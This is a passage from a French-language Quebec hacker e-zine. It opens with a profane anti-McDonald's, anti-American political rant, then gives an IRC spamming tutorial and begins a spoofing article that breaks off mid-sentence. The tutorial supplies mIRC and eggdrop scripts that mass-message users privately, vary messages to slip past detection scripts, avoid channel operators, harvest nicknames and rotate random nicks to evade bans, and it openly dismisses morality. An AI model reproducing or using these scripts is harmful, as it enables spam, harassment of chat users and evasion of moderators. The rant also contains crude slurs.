_,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Passez GO et reclamer 200$ ]=- "Si vous désirez une image de l'avenir, imaginez une botte piétinant un visage humain... éternellement" - George Orwell. Afin d'agrandir son empire de la honte, les États-Unis n'ont aucune limite. Que ce soit par la violence (guerre en Irak), par de la propagande (médias), ou par différentes façons plus subtiles (star-academie), tout les moyens sont bon. Leurs cultures, leurs religions, leur systeme économique, leurs si et leur ça : tel est la vérité absolue. Donc j'avais le choix ! He, un texte qui parle en mal de l'impérialisme américain. J'aurais pu m'attaquer à star-épidemie, une copy du model américain, qui est maintenant le notre, on s'entend (un bon coup réussi) afin de crée des artisss kétaines, de toute pièce, modelés à la Quebecor; mais je suis un peu tanné de frapper sur Wi-Wilfred. J'aurais pu aussi m'attaquer à wal-mart, mais j'ai promis au gros smilay face jaune de me taire. Il est tellement cute et coquin, on a le goût de le serer dans nos bras, fort, fort, très fort, jusqu'a ce qu'il ne respire plus. Alors j'ai choisi McDonald. Un choix difficile, j’avoue. Les autres concurrants étaient de taille. Tous aussi capitalistes les uns que les autres, tous aussi laids, sanglants et cruels. Mais dans la vie, faut faire des choix, et en assumer les conséquences : c'est donc ce que vous lirez. (a moins que la Lune soit réellement carrer ?) avertissement : le reste de l'article peut ne pas plaire à quelqu'un. Si vous vous reconnaissez, en tant que quelqu'un, courrez vite au dépanneur du coin en demandant à la caissière si elle aurait pas vu quelqu'un. Vous aller passer pour un mongole fini, mais ça risque d'être drôle, ça en vaut le coup. Ce qui est fort agréable pour les touristes du monde entier, c'est que même si ils se trouvent en Chine, au Japon, en Italie, en France, ... partout, ils vont pouvoir spoter, avec leur oeil de lynx,le gros M jaune, le flashy M, M comme dans McDonald, M comme dans Marde, M comme dans Manipulation, M comme dans Manigance, M comme dans maison (ok je m'éloigne un peu.) Agréable ? peut-être. J'imagine que certains gros touristes bedonnants vont se régaler. M comme dans Menoum Menoum. Pendant que les organisations essais de convaincre les gens que de la McMarde, ce n'est pas bon pour la santé, GreenPeace multiplie leurs attaques contre McDo, d'autre s'intéresse à leurs publicités trompeuses, d'autres à leurs tendances anti-syndicalistes... tout le monde y trouve son bobo.C'est une cible de choix, par excellence. Bref, si votre vie ne va nul part, analysé un peu le phénomène McDo, et vous pourrez vous aussi vous consacrer corps et âme à détester le phénomène. Au pire, achetez vous un réveille-matin chez wal-marde, et réveillez vous dans la nuit pour haïr mcdo : ça fait sérieux en criss. Moi, personnellement, ce qui m'intéresse (sans dénigrer les autres qui, comme moi, haïssent McDo), c'est l'image. Parce que, un McDo, en dehors de la structure physique de l'établissement, c'est une masse de propagande, c'est l'impérialisme américain qui s'installe, qui prend sa place, qui nous vole quelques coussins afin d'être confortable, et on fini par lui donner le sofa en entier. Quand on regarde un Mcdo, on voit une image condensée de tout un pays : notre voisin du sud, les states, les États-unis : le pays de la guerres, de la violence, du brain-washing collectif, de la paranoïa,du "patriot act", du "right to bear arms", de la peine de mort, ... un pays dirigé par le cowboy le plus populaire après Lucky Luck : W. Bush, le FILS. McDonald, c'est d'abord et avant tout un problème du type "mal bouffe", "junk food", ou fast-food. Tout le monde le sait, et chacun est libre de choisir d'y aller 1 fois par jour, 1 fois par semaine, 1 fois par année, ou 24 fois par jour, ou de ne jamais y aller; j'm'en criss, c'est leur choix. Tout le monde est conscient qu'un McJunior, ce n'est pas une salade de fruit. Suffi d'y aller une fois, suffi simplement de sentir l'intérieur de l'établissement, ou de prendre une boucher, et je crois qu'instantanément, on a parfaitement compris. S't'une question de goût. Y'en a qui aime, d'autre non. Si en rentrant chez vous, le soir, après une dure journée d’ouvrage, vous décidez de vous mettre nu, de lichez le tapis d'entrer, et de chantez la bamba, c'est de vos affaires. Je vais surment vous trouvez bizarre, mais ça ne me regarde pas : ça, ou que vous décider d'aller souper chez McDo, c'est votre choix. Mcdonald, c'est beaucoup plus, malheureusement. En dehors de la graisse, des McTrio, et du passeux de ballet payer à 6$ de l'heure, c'est l'image la plus net et pure de l'impérialisme américain, de la religion du fast-foodisme, de la forme de société à atteindre. L'idée McDonald est fondée directement sur le principe de la l`état américain : le capitalisme. Un McDo, qu'il soit au Canada ou au Japon, c'est le portrait tout craché de la société idéale américaine, de A à Z, instauré et animé par leurs élites bourgeoises : la société de l'argent, du fric, du cash; la société capitalisée, où être riche est une qualitée, et être pauvre, un défaut; un idéal américain prônant le capitalisme, la mondialisation; dans lequel l'exploitation de l'homme par l'homme est une "po pire" forme de profit; où l'oppression du peuple se vois même à travers la "national tivi", une société dans laquelle les pauvres sont regroupés ensemble, pour être pauvre entre eux; où les medias couchent avec la gang de cowboy du président afin que tout paraissent blanc, ben blanc! dans tout les sens du mot. Une société dans laquelle le patron t'aime, parce qu'il te donne le droit d'aller dîner : "oui oui, va dîner, mais fait ça vite au moins, i reste d’la job en masse, y'a encore de l'argent à faire". C'est une façon pacifique d'agrandir leur Empire. C'est moins cruelle que la guerre, mais à long terme, on en souffre tous. Imaginez-vous simplement que vous êtes tannés de votre petit appartement. Tranquillement, vous décidez d'aller chez votre voisin, vous lui tordez le bras, et vous commencer à ranger vos vieilles cochonneries chez eux. D'une certain façon, son appartement deviens un peu le votre. He bien, voila l'idée. S'imposer. Avec la venu de la mondialisation, on à construit un belle route semi pavée afin de laisser rentrer l'impérialisme américain. Qui lui, évidement, nous à apporté son chumy le capitalisme. Un bon chum, il se sont rencontrés à l'université, mais on en discutera un autre jour. Ce n'est donc pas sorcier de comprendre comment l'empire américain tentent sans arrêt de repousser ses limites en dehors de la géographie, c'est-à-dire d' "imperialiser" les autres peuples, en s'attaquant à leurs cultures, à leurs économies, à leur valeurs, à leurs morales, à leur façon de penser ... et inévitablement, à leur façon d'être. C'est de la propagande de haut niveau, très bien planifié, très bien préparé, très bien enveloppé, dans un beau paquet ... on aurait pas pu mieux imaginé. L'idéal pour eux, c'est que le Canada, en se qui nous concerne, devient un état américain. Il ne le deviendra pas géographiquement, mais vite, il sera devenu l'image miroir des Etats-Unis : L'État Canadien. THE CANADIAN STATES OF AMERICA. On deviendra surment aussi anti-humaniste que eux, puisqu'ils seront nous. Les nutritionnistes, les environnementaliste, les écologistes, les communistes, les sociologistes, les j'aime-la-vie, les anarchistes, les pro-fédéralistes qui aiment leur Canada, les syndicalistes, greenpeace, et tout les mouvement pour la paix ... tous luttant chacun pour leur causes. Le McDo : en voila une cause commune ! Indirectement, tout ce que le mcdo représente, ça touches les environnementaliste, les écolo, les mouvement pour la paix, ceux qui en ont marre des fausses guerres à la Bush ... et j'en passe. C'est l'image américaine, mieux habillée, pinponée, avec un nez de clown ... mais ça reste L'IMAGE américaine pareille ! de l'impérialisme déguisée en graisse à patate frite ... c'est de l'impérialisme pareille, calice ! Si on accepte l'impérialisme américain sous toute ses formes, on doit en accepter la totalité des choses que ça représentent. Et la solution est simple, si on n'accepte pas, on s'en débarrasse. La première chose à faire, c'est de stopper la conquête de l'empire américaine ... le centre du problème. Mais la machine est grosse, la machine est puissante, féroce, vorace, sans gène et assoiffé de pouvoir. Tout le monde devrait être là. Mais nous sommes tous occupés un peu partout ailleurs. L'idée n'est pas de nier systémiquement tout ce qui est américain. C'est de cibler ce qui représente le mieux la société américaine, ce qui nous dissous dans celle-ci. Souvent, c'est très subtil, des fois beaucoup moins. Les têtes dirigeantes américaines savent très bien ce qu'ils font ... Un peu partout dans le monde, on voit apparaître de nouveaux mouvements : souvent trop extrémistes, souvent pas assez; souvent trop porter vers l'activisme , souvent trop porter vers de belles paroles. La façon de faire idéal, je ne l'ai pas. Tout ce que je sais, c'est qu'il est temps, au moins, de faire réagir tout le monde. Même s'il faut les choquer, on doit provoquer la discution. Si la majorité décide d'accepter, on continue avec la "democracy", et on en paie le prix. Si la majorité décide que c'est assez, ça risque de peter, tôt ou tard. Mais criss, il est temps qu'on en parle plus. Même ceux qui sont tannés d'en entendre parler ... il faut les ranimer, les réveiller, leurs prouver qu'on est pas une gagne de fou sans raisons; leurs prouver que ce n'est pas une question de mode ou de tendance; leurs prouver que le danger est réel, qu'on ne l'imagine pas. Nous régressons à vu d'oeil, et bon nombre de personnes se ferment les yeux. Les yeux fermés, tout est tellement plus beau. Un jours, nous allons re-ouvrir nos yeux, et constater le dégât : on va devenir une belle colonie américaine, nos forets seront rasés par nous, sous l'ordre du gros patron bien assis a New York (va bien falloir qu'on travaille pour vivre); ils vont venir chez nous,déverser leur merde dans nos rivières; ils vont nous vendre de la cochonnerie à faire du profit: au diable l'environnement, le profits leurs suffi. Un beau signe de piasse dans leurs grands yeux illuminants ... le hummer, la maisons, le chalet, la piscine intérieur, ça ne leurs suffira pas longtemps ... la bourgeoisie américaine a déjà exploitées son propre peuple sous tout les formes et angles inimaginables : on est les prochains. C'est la loi du capitalisme, c'est les raisons de la mondialisation, c'est les conséquences de l'impérialisme. Et Nos Grand Dirigeants, Nos Grands Ministres, Nos Grands Elus ... Vont-ils un jour comprendre que les États-Unis, ce n'est pas l'exemple à suivre ? Qu'ils faut absolument s'en dissocier, et se prononcer intégralement contre ? Vont-ils un jour comprendre qu'on vie une période d'assimilation AMERICAINE ? Que l'on est en train de s'associer avec eux, qu'on est de plus en plus lié a tout leur guerres, à leur "terroristes patout patout", à leur sois disant "freedom and democracy" ? Vont-ils un jour comprendre qu'on se fait de plus en plus exploiter par la bourgeoisie américaine ? Ils sont trop occupés à jouer golf ? Ils sont trop occupés à visiter la Chine ? Ils ne veulent pas comprendre ? Ou ils vont attendre qu'il soit trop tard, comme toujours. Si oui, qu'on ne reviennent pas essayer de me convaincre que le Canada est un pays socialiste. Mais si on me dit que le Canada est l'états le plus socialiste de tout l'empire americaine, frontière confondue, ça, j'y crois. Le peuple américain va se libérer de leur exploitation probablement bien avant nous, il y à déjà trop longtemps que la majorité des habitants se font exploiter par la grosse bourgeoisie, beaucoup moins nombreuse, mais beaucoup trop puissante. J’espère que nous n’aurons pas à subir un aussi long voyage qu’eux avant qu'on se réveille ... A mort le capitalisme haineux; A mort la mondialisation meurtrière; A mort l'impérialisme déguisé; Et bienvenue à Ronald McDonald, NOTRE clown canadien ! Fait comme chez toi, mon grand ... ya dla bière dans le frigo. c4. "Mais l'monde oublie vite c'est pas grave Suffit de faire un bon budget D'parler d'santé pour que les caves Vous réélisent l'année d'après Comme ça vous pourrez en cachette Continuer d'exploiter les hommes Et mondialiser la planète Pour enrichir vos chums" - Les cowboys fringants, En attendant .--------. .--------. .-. .-----.. /--/ /--/ /--/ .--------. | .----. | | | .` , | \ | / | / | / | | | | .| | | .----` | | | /--. | | | | |\ | | | .-----` | | ./ - | ; .. | `, | | \ | | | | | \ | | | | | |_/ .` | |__.'`| |` . | | | | | | | | | \ | | | | .----. | \._ | ___| | /| `, | | | | | | | |\ \ | | | | \__ | | ; | .` .` \`\ | | | | | | | | | \ \ | | | | | | | .. ; | ;____.; | |`\ `, | \----/ | | | | | \ \ \ | | `----` | | | `. | | | /_/ \ | | | | | | | \ \\ | | | `-` '--' `--------' ` \,`\`--------` \ | \ | \____/ `--------` '|. `\ `\ /\ ` .--------. .-. /--/ | '. .--------. .--------. .-. .-----.. | .----. | .` , | / | / | .----. | | | .` , | \ | | .| | | | | | | | | | .| | | .----. | | | | /--. | | | ./ - | `, | | | | | | ./ - | | | | | `, | | \ | | |_/ .` |` . | | | | | | |_/ .` | | | | |` . | | | | | | \._ | /| `, | | | | | \._ | | | | | /| `, | | | | | ; .` \`\ | | | | | | ; | | | | .` \`\ | | | | | | .. ; | |`\ `, | | | `-, | .. ; | `----` | | |`\ `, | \----/ | | | `. | /_/ \ | | | | `'., | | `. | | | /_/ \ | | | `-` '--' ` \,`\\ | \________;. `-` '--' `--------` ` \,`\`--------` '|.`\ '|. ` ` .----------. .______________________ / \ ,' / / \ / / ' .' / / \. / | / , .| | / | | `, / `| /' \ .| \. .| \ / | / | | \. .` `, | __\ /____________________\ | ,'` ` ' | /` | / | .' \ | `| | \ | \ `, `, \ \ `. \ ,' \ / \ ' .| _______________ ___| ,' .' | | | | / | |. .| |. .| / | ;. .; ;. .; ' | . / .. ./ ,' | ', ,` ', ,` --------------` `''-'` `''-'` | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Wyzeman ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O8]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ The `''.,, ``'.,,-/``--., `.,`'., | ', | art `'-.,_ `''.,. `| `-, '.------- '\,_ of `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ IRC `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ spamming ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Le temps perdu c'est de l'argent ]=- Vous avez une caisse de viagra dans votre guarde robe que vous devez vous débarrasser ? Vous êtes à la recherche d'un moyen cheap et farfelu pour vendre vos breloques ? Vous vous demandez s'il existe une alternative pseudo légal au mail spamming ? Vous avez rien à foutre, vous êtes saoul pi tout le monde dors sur irc et vous avez envie d'annoyer des inconues en privé ? Ou encore si pour une raison plus ou moin bidon vous aimez participer au chaos global, cette article risque probablement de vous interresser, si ce n'est pas votre cas, on vous laisse quand meme le droit de le lire, mais venez pas nous dire que c'est exactement s'que c'est, on le sait deja. Apres tout, on sait que vous s'avez qu'on sait ;] Depuis l'aube des temps, l'être humain rêve de possèder un porte voie universel pour vendre ses tapis à son voisin. Vous, oui vous, n'êtes pas si différent à cet être pas si pré-historique qui étais notre ancetre au temps où l'age de pierre régnais à chaque lever du soleil. Vous possédez en vous le même désire dimposer vos idée et de faire de l'argent facile sur le dos de vous voullez pas trop savoir qui. He bien il vous est maintenant possible de le faire sans effort, en lisant cette article, vous allez maitriser quelque concepte simple mais efficace qui ferons de vous un spammer tout aussi riche que discret. Si vous faite attention même votre mère ne sera pas au courant, parole de lémurien. table des matieres (par ordre de parution dans l'article) 1) dumb irc spamming aka the tourist method a) la méthode du débutant naif b) le méthode du debutant astucieux c) la méthode du débutant qui a du sang de lémurien d) la méthode du script kid aussi dumb que sont cul e) la méthode du hardy bucheron illuminé f) la méthode du script kid illuminé g) la méthode du script kid qui a du sang de lémurien 2) clever irc spamming aka la technique de l'homme de paile a) la méthode du programmeur blazé b) la méthode du programmeur blazé et sans ressource 1) dumb irc spamming aka the tourist method n'importe qui peu faire du spam, mais nimporte qui fait généralement du spam de mauvaise qualité. Neanmoin faire un petit listing des quelques méthode de base que tout le monde peu facilement (et non pas necessairement comprendre "sans effort") executer nous serviras entre autre, d'exemple à ne pas suivre, et de base generique pour la démystification de concept plus évolué. a) la première méthode de spam irc identifiable consiste simplement à taper sont message sur le ou les channels sur lequel on désire se faire de la pub. avantages : - moyen de choisir un public cible désaventages : - haut risque de se faire bannir - le tout dois etre faite à la main - le procédé devient rapidement pénible si le spammeur veut faire sa pub sur une longue periode de temps b) la variante logique de se spam est de faire sa pub sur tout les channels ou le spammer est présent d'une seul commande irc , j'ai nommé le célèbre /ame. avantages : - on a moin l'impression d'etre un epaix qui radote 10x la même chose désaventages : - à moin de choisir particulierement tout les channels sur lesquel le spammer se tien, l'avantage du public cible est perdu. - le procéder demeure toujours pénible si le message veut etre répéter sur une longue période de temps c) Pour ceux qui sont un peu plus désabusé et qui possède quelque notion de scripting l'idée leur viendra rapidement de créer un timer pour automatiser cette tache ingrate qu'est de répéter de facon continu un message sans intéret en lui même. ie 1: /timer 0 3600 /privmsg #quebec les civics s'envole partout ie 2: /timer 0 3600 /ame les civics s'envole partout avantages : - on peu jouer a CS en même temps qu'on fait notre spam - on n'à plus l'impression d'être le dernier de la chaine alimentaire désaventages : - on augmente les chances de se faire bannir d) Il est reconnu que ceux qui vont en prison ne passe pas go et ne peuvent réclamer leur 200$. Ce proverbe plein de sagesse est bien connu du spammer qui cherchera à éviter le plus possible de se faire bannir de ses channels de prédilection. Donc apres s'etre faite bannir quelque fois (notez que les multiples facon de se faire debanir ne sont pas couvert dans cette articles), le spammeur devenu plus paranoyaque aprendra à être plus discret en utilisant plusieur phrases structurer de facon à ce que les scripts ne le détecte pas en créant une petite fonction qui sélectionnera pour lui une phrase au hasard parmis quelque phrase prefab, ou il sera tout aussi bien de s'assurer que le message qui s'apprete à etre spammer ne soit pas le meme que le prècèdent. ie 1: ;aliases /spam { :spam %spam = $read(mindkind/spam.txt) %x = 0 if {%spam !iswm %lastspam} { while(%x <= $numtok(%spamchan,32)) { /privmsg $gettok(%spamchan,%x,32) %spam %lastspam = %spam inc %x } } else { goto spam } } avantages : - vous devenez plus difficile à identifier en tant que spammer pour un script/bot - vous faites de l'argent sans effort desavantages : - vous restez quand meme facilement identifiable par le commun des ops - on vien de perdre 90% de ceux qui ont aucune notion en programmation et/ou scripting. e) Évidament le best reste d'etre hors de vue de ceux qui peuvent vous causez préjudice. donc, la facon la plus facile reste de privmsg tout ceux qui sont pas op en privee avec votre spam. On souhaite bonne chance à ceux qui veullent faire ca à la main et nos condoléance à la famille de ceux qui se sont essayé par le passé. avantages : - votre spam devient plus difficile à détecté désavantages : - cette technique est encore plus longue et fastidieuse que les première technique décrite, et à vrai dire, vous risquez de vous suicidez avant d'en avoir terminer. - overall cette technique ne dépassera jamais le stade de très mauvaise idée. f) Comme aucun problème ne tien bon a un bout de code bien monté, il existe évidament donc une méthode intéligente et facile à notre problème de privmsg, la plus simple consiste a messager les on join (ou les on part (ce qui est mieu encore dans un sens)) avec un message pré enregistrer, ou nous pouvons pour plus de discretion (ou de variation) utiliser plusieur spam choisi au hasard, toujours en s'assurant de ne pas envoyer le meme deux fois de suite. ie 1: ;remote on *:part:#: { if ($chan isin %spamchan && $nick != $me && %ircspam == TRUE) { /msg $nick %spam } } ie 2: ;remote on *:part:#: { if ($chan isin %spamchan && $nick != $me && %ircspam == TRUE) { :spam %spam = read(mindkind/spam.txt) if (%spam !iswm %lastspam) { /msg $nick %spam %lastspam = %spam } else { goto spam } } } ;popups .spam ..spamchan:halt ...$iif(!%ircspam,activate):%ircspam = TRUE ...$iif(%ircspam,desactivate):unset %ircspam avantages : - le spammer devients difficiles à identifié si personne ne le dénonces - encore une fois le spammer fait de l'argent sans effort désavantages : - on n'a aucun moyen de savoir de facon simple si la personne qui join ou qui quite est un op g) une méthode altnernative consiste à messager de facon random avec un timer des usagers qui ne sont pas op. De plus, le spammeur avec un esprit lémurien sait metre à profit des combinaison de plusieur connaissance en principe anodine pour renforcir sont jeux (un bon roublard à toujours un as de trop dans sa manche au cas ou...). Le spammer irc avisé sait donc que la commande /who permet de lister les usagers d'un chan, et se meme si nous ne somme pas sur le chan, a moin que celui-ci soit en mode +s (ce qui n'est pas la majorité des chans public, cible de prédilection des spammeurs irc). Le spammeur pourra donc ainsi satisfaire sont content de publicité sans avoir à etre présent sur le dit channels. ie : /timer 0 1800 /spam ;remote raw 352:*: { if (%gethost) { write mindkind/ $+ $2 $+ .txt $6 } } ;alias /spam { if ($chan isin %spamchan && $nick != $me && %ircspam == TRUE) { %x = 0 while(%x <= $numtok(%spamchan,32)) { /who $gettok(%spamchan,%x,32) inc %x %nick = $gettok(read($gettok(%spamchan,%x,32) $+ ".txt"),0,32) if (%nick !isop $gettok(%spamchan,%x,32)) { /privmsg %nick %spam } } } } ;popups .spam ..spamchan:halt ...$iif(!%ircspam,activate):%ircspam = TRUE ...$iif(%ircspam,desactivate):unset %ircspam avantage : - on est presque sur de pas messager un opérateur du channels par erreur. désaventage : - reste le danger de messager un op non identifier et non affiché 2) clever irc spamming aka la technique de l'homme de paille jusqu'ici nous avont parler de spamming amateur, des techniques généralement utilisé pour spammer une radio internet ou la création d'un xième chan inutile. Les technique suivantes s'addresse à ceux qui sont vraiment sérieux. Comme dit précédament, la meilleur facon de ne pas se faire prendre est de ne pas etre sur les lieux du crime. Par contre, comme nous avons vu il existe certaine limite du au fait que nous devons connaitre le nick des gens qu'on désire spammer, le spammer se doit detre sur le chan (ou du moin de faire un join/part) pour avoir access à la nick liste, dans le meilleur des cas, un /who sur un chan qui n'enforce pas le mode +s nous donneras la liste de tout les nicks qui ne sont pas eux aussi +s. a) La méthode classique pour bypasser se problème est dite; la méthode de l'homme de paille. Elle consiste à avoir un complice sur le ou les channels que le spammer désire spammer qui envoi les informatins pertinantes (/join, /part, /who) à un partenaire qui se tien au millieu de nul par. Il est préférable de garder une certaine trace de qui à été spammé et de qui ne la pas été. ie : ;remote on *:JOIN:#: { if ($chan isin %spamchan && $nick != $me && %ircspam == TRUE) { /msg %spambotnick !spam $nick $address($nick,1) } } ;popups .spam ..spamchan:halt ...$iif(!%ircspam,activate):%ircspam = TRUE ...$iif(%ircspam,desactivate):unset %ircspam #tcl for eggdrop #by obviously wyzeman #the rest is code... set spam "Les civics s'envolent partout" set minarray 0 set maxarray 20 bind msgm - * spam proc spam {nick host hand arg} { global spam minarray maxarray #putlog "$nick" #putlog "$host" #putlog "$hand" #putlog "$arg" set readdata [open maz/spammednick r] set y 0 while {![eof $readdata]} { set buf [gets $readdata] if {[string length $buf] > 1} { set spammednick($y) $buf incr y } } close $readdata set readdata [open maz/spammedhost r] set y 0 while {![eof $readdata]} { set buf [gets $readdata] if {[string length $buf] > 1} { set spammedhost($y) $buf incr y } } close $readdata avantage : - on a plus besoin de vérifié qui l'on spam, puisqu'on est virtuellement impossible à bannir. désaventage : - on peu toujours se faire glined par un ircop. - il faut possédez la capacité d'avoir 2 ip different et idéalement 2 isp différents et 2 identd différent pour que la technique résiste à une localisation par /who b) comme les événements font en sorte qu'un spammer n'a pas toujours access aux ressources qu'il aimerait bien avoir, il doit parfois compenser par un brin d'ingéniositer. l'idée est simple, il suffit de joigner préalablement les channels que l'on désire spammer pour obtenir leur liste de nick et ensuite de quittez le chan. Il peut aussi être une bonne idée de changer régulierement de nick afin déchaper au /who nick. Nous devenons donc ainsi en quelque sorte, notre prorpe homme de paille. /timer 0 1800 /spam ;remote raw 352:*: { if (%gethost) { write mindkind/ $+ $2 $+ .txt $6 } } ;alias /randnick { %nicklen = $rand(5,9) unset %i unset %nickname %i = 0 while (%i <= %nicklen) { %letter = $rand(a,z) %nickname = %nickname $+ %letter inc %i } nick %nickname } ;alias /spam { if ($chan isin %spamchan && $nick != $me && %ircspam == TRUE) { %x = 0 while(%x <= $numtok(%spamchan,32)) { /join $gettok(%spamchan,%x,32) /part $gettok(%spamchan,%x,32) /randnick inc %x %nick = $gettok(read($gettok(%spamchan,%x,32) $+ ".txt"),0,32) if (%nick !isop $gettok(%spamchan,%x,32)) { /privmsg %nick %spam } } } } ;popups .spam ..spamchan:halt ...$iif(!%ircspam,activate):%ircspam = TRUE ...$iif(%ircspam,desactivate):unset %ircspam cette article pourrais surement continuer sur quelques k encore en brettant sur le mixte de plusieur technique pour vous faires accroire à une nouvelle, mais je crois sincèrement que si vous vous êtes rendu ici, vous n'avez plus besoin de moi pour faire les steps suivantes. j'aurais pu aussi doubler la grosseur de l'article en recodant tout ses scripts en tcl pour xchat, mais encore une fois si vous êtes fru que ca n'est pas été faite c'est que vous avez propablement les moyens dle faire vous même et cette article vous l'aurez compris ne s'addresse pas à vous. C'est donc sur cette penser négative que se termine cette article, tout en espérant que vous n'en ferez pas une cause de suicide pour autant. Rappellez vous, le spam etant immoral et enrichissant, vous addonnez à cette activiter enlourdira autant votre protefeuille que votre conscience, mais pour me sitez moi meme: "la morale n'existe que dans la tete de ceux qui la concoivent". sur ce, bon dodo. wyzeman ,------. ,',, | `` , | | | | `,. / ` ```````' . ,.-'` _,- ,,,-' ., _ / ,',_-`#A'. O . \ \`H`, ```.`` \,X#W##`. , | C / `\ `\I#P###| . |_' T . ` G `\##MM#`. .. ,` I_' \ ,' \#BW##`, | | / W/\ | / |#N##Q#\ ,-, '' _.``| E / \ \_ /. /`\ ., ''''#W##' | | . . /_.- `H `-,, \ `,,- `` `\ | |`.#X| . | | O ` /F T,' `,.'', \ ,/---/ /,/ \#| `'' ..., O /O _, / `'`;\ `.`````'|/ \| / , ' - `-`` `-, /`` \ O | | .. ,' B/ | _ `'._ ' \ \ ` . | | /- U/ ````''--.,, `,| / \ ,--., `''` '' /O P/ . `. `-,, | \ __,' \....--------.,-,..,,,,'F .' \ ``' ` | _,,.-''```` | | | | / N ,'````''-.,,, `, | ,-'` | |''''```````| |''/ I /.,,_ `'-, \ ,| _ /-'''''```````\ / , `''. ` ` ```'_ | \ |`| /|`-,'` .,,`'--'` ,.-` \,,- `.'..-' _.-`-. '''''_,-`| `. | | | \ ``''-..,,,_ ` ,,,,.--'`` / `-... / | |/ \ ``````''''''''---------'''''''`````` / \.,,,_ | | || \ / | ``'''' ' | /| | |`''-..,,,_ _,,,,.--'`| | |/ | | | | | ``````''''''''---------'''''''`````` | | / | , | -' | | Le webring hack.fr: | | | / | | | | - Mindkind http://www.mindkind.org | | | | | / / | - Hackever http://hackever.n0ne.org | \ . | | | . | - Pyrofreak http://www.pyrofreak.tk | . | | | | / | - QC2600 http://www.qc2600.org | \ / | | | / | - Underground hack http://www.undergroundhack.com | \ / | | | , | - radio31337 http://radio31337.mindkind.org | , | / | . | | - mrgibson http://mrgibson.zapto.org | | | | | `. | | - hackebec http://hackebec.sytes.net | |, , | | \ | | - linuxcafe http://www.linux-cafe.ca | | `'. ,` | \ \ _/. | | / `. | \ \ ` `-, ``''-..,,,_ _,,,,.--'`` ,` /.` \ \ ``-,, ``````''''''''---------'''''''`````` _,/ .'| ` \ , , ```'-..,,,_ _,,,,.--'`` ,` / \ '''-- `-., ```````'''''''---------'''''''`````` ,,,,-` ````''...,,,,,,,________ ,\. `.___ ---,, ,.--------,, ,,-'` ````'-..`` ` ''--''`` ```'.,,,,,,___------'` | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ binf ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O9]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | Le `'-.,_ `''.,. `| `-, '.------- '\,_ Spoofing `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : J'me suis caché pis vous m'avez pas vu! ]=- Avant de commencer je voudrais dire que cet article la a ete ecrit pour les newbies tout comme les plus avances en hacking. Il sagit bien-sur d'un texte d'information: Le spoofing... hum quelle belle invention..:) heheheh bien-sur il y a 10 ans.. sur ARPANET l'ancetre d'internet..on pouvait spoofer a notre guise.. dans les debuts d'internet aussi...mais maintenant tout a change... on ne peut plus seulement ACK SYN Flooder une target pour spoofer..du moins je parle de 99.99% des computers sur internet...les protocols ont ete modifies avec le temps..mais comment peut on oser dire qu'on spoof..! Hum...Bien ca depend des points de vue.. il y a plusieurs methodes..qui sont aujourd'hui disponibles pour vous: 1-iDENT spoofing (Tres lame..dumoins ce n'est pas du vrai spoofing) 2-Wingate spoofing , proxy spoofing , shell spoofing (50%) 3-Le BLiND (100% mais une seul direction) 4-BiND spoofing (le vrai, le seul, l'unique spoof a 2 directions) 1- iDENT spoofing ...wow...le spoofing pour win 95 haha super..je me connecte sur irc avec un programme qui modifie mon ident...hum mais mon dns reste le meme..que faire? Bon...heheh ceci est considere comme du spoofing.. mais en fait..ce n'est que l'adresse qui est modifie.. quand on se connecte sur le serveur le programme envoie une chaine de caracteres qui fourvoie le serveur et qui vous permet d'impressioner les petites filles dans le channel 13 and et moins.. avec une adresse bidon comme (nick)@ha.je.taime.anne11 En fait vous restez vulnerable aux attaques des DoS(Denial of Services) ou NUKES...des floods..ect...une seule bonne application des idents spoofs c'est que vous pouvez 